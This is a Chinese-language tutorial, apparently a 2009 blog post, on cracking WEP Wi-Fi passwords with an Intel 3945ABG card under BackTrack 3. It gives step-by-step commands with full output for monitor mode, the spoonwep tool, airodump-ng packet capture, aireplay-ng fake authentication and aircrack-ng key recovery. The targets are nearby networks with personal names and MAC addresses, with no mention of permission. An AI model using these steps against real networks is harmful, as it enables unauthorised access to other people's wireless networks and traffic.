Intel3945ABG在BT3下无线网络密码破解
===================================
网络上关于无线网络破解的工具有很多,我手头上就有几个:WinaircrackPack, CommView_for_wifi, BT3。
这几个工具运行环境和界面都不同,但是都是基于airodump-ng这个工具的基础之上。其中WinaircrackPack和Commview_for_wifi运行在windows 环境中,要求无线网卡驱动支持网络监听。如果不支持监听,则不能成功,使用中会报错。
BT3是个封装好的linux平台,里面有很多黑客工具,其实就是个黑客工具包。关于如何启动进入BT3有很多介绍可以在网上查询,下面只介绍如何用其中的工具进行破解:
首先启动BT3,进入图形界面,运行一个命令窗口。
root@bt:~# ifconfig -a (查看本机网卡)
eth0 Link encap:Ethernet HWaddr 00:24:81:64:B7:3A
inet addr:192.168.1.105 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1
RX packets:39 errors:0 dropped:0 overruns:0 frame:0
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:4774 (4.6 KiB) TX bytes:1974 (1.9 KiB)
Base address:0x4020 Memory:e4600000-e4620000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
wlan0 Link encap:Ethernet HWaddr 00:1F:3C:D8:E9:E6
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
root@bt:~# airmon-ng start wlan0 (开始网络监听,error信息显示不支持或没有启动监听状态)
Interface Chipset Driver
wlan0 Intel 3945 a/b/g iwl3945 - [phy0]
ERROR: Neither the sysfs interface links nor the iw command is available.
Please download and install iw from http://dl.aircrack-ng.org/iw.tar.bz2
root@bt:~# modprobe -r iwl3945 (查询状态)
root@bt:~# modprobe ipwraw (启动监听状态)
root@bt:~# airmon-ng start wlan0 (监听状态启动,无线网卡名称变为wifi0)
Interface Chipset Driver
wifi0 Centrino a/b/g ipwraw-ng
一. 利用图形工具spoonwep
root@bt:~# spoonwep (启动spoonwep程序)
说明:该程序是个图形界面,在第一个页面里选择网卡(wifi0)、网卡类型(normal)、是否知道要破解的无线网。 点击下一步。
如果知道要破解的无线网,则在第二个页面里必须填写无线网的MAC地址。接下来就是等待自动破解了, 速度快的话很快就能看到破解的KEY了,^_^。
如果选择了不知道则程序自动扫描能发现的无线网,会比较慢。然后选择一个进行破解,和上面一样。
二. 完全命令行程序
root@bt:~# airmon-ng start wifi0 6 (将监听网卡换成wifi0, 6 是无线频道,依据实际情况调整)
Interface Chipset Driver
wifi0 Centrino a/b/g ipwraw-ng (monitor mode enabled)
root@bt:~# airodump-ng --ivs -w default -c 6 wifi0(抓数据包,default是无线网的名称,根据实际情况调整。程序会在当前目录下生成default-01.ivs文件)
CH 6 ][ Elapsed: 14 mins ][ 2009-08-01 14:12
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:E0:94:46:D6 0 0 39 0 0 6 54. WPA2 CCMP PSK <length: 6>
00:13:46:50:C8:C9 0 0 48 0 0 6 54. WEP WEP default
00:21:27:6E:0E:A6 0 1 3047 16 0 6 54. WEP WEP worldwise
00:25:86:27:7B:A2 0 29 1996 0 0 6 54. WEP WEP TP-LINK_277BA0
00:1E:58:0F:AA:0A 0 39 5206 0 0 6 54. WEP WEP erichou
00:03:7F:BF:01:A2 0 0 549 0 0 6 54. WPA CCMP PSK ALPHA AFW-GR50
00:18:39:3A:58:9A 0 0 238 9 0 6 54 WEP WEP lillian
BSSID STATION PWR Rate Lost Packets Probes
00:13:46:50:C8:C9 00:24:2B:F5:23:82 0 0- 0 12 979 default
00:21:27:6E:0E:A6 00:1F:3B:D0:DE:23 0 0- 0 0 11
00:18:39:3A:58:9A 00:1B:63:C6:EB:60 -1 0- 0 0 6
(not associated) 00:13:02:51:DA:A9 0 0- 0 0 39 KFC-007
(not associated) 00:19:D2:4E:B6:C4 0 0- 0 0 102 azhi
(not associated) 00:18:F3:45:5D:8B 0 0- 0 0 21 TP-LINK_8DCFDC,linksys1
(运行另外一个命令窗口,运行破解)
root@bt:~# aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac wifi0
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful
这时,airodump-ng窗口的变化
这时候等Data有了1万5就可新开个命令窗口,用aircrack-ng来破解了。
root@bt:~# aircrack-ng default-01.ivs
Opening default-01.ivs
Read 31 packets.
# BSSID ESSID Encryption
1 00:1E:58:0F:AA:0A erichou Unknown
2 00:25:86:27:7B:A2 TP-LINK_277BA0 Unknown
3 00:21:27:6E:0E:A6 worldwise WEP (16 IVs) (实际情况中IVS必须10000以上才可以破解)
4 00:13:46:50:C8:C9 default Unknown
5 00:03:7F:BF:01:A2 ALPHA AFW-GR50 Unknown
6 00:18:39:3A:58:9A lillian WEP (9 IVs) (实际情况中IVS必须10000以上才可以破解)
Index number of target network ? 3
Opening default-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 16 ivs.
Aircrack-ng 1.0 rc1 r1085
[00:00:08] Tested 148993 keys (got 16 IVs)
KB depth byte(vote)
0 255/256 FF( 0) 1D( 220) 1E( 220) 3A( 220) 76( 220) 7C( 220) 7E( 220)
1 0/ 10 AA( 440) 08( 220) 3F( 220) 45( 220) 4F( 220) 76( 220) 7A( 220)
2 16/ 2 ED( 72) 10( 36) 14( 36) 19( 36) 2B( 36) 30( 36) 34( 36)
3 0/ 1 1A( 440) 06( 220) 20( 220) 32( 220) 3E( 220) 49( 220) 56( 220)
4 2/ 4 B6( 256) 0A( 220) 15( 220) 3D( 220) 6F( 220) 7C( 220) 83( 220)
Failed. Next try with 5000 IVs.(这种情况就是ivs太少,实际情况中IVS必须10000以上才可以破解)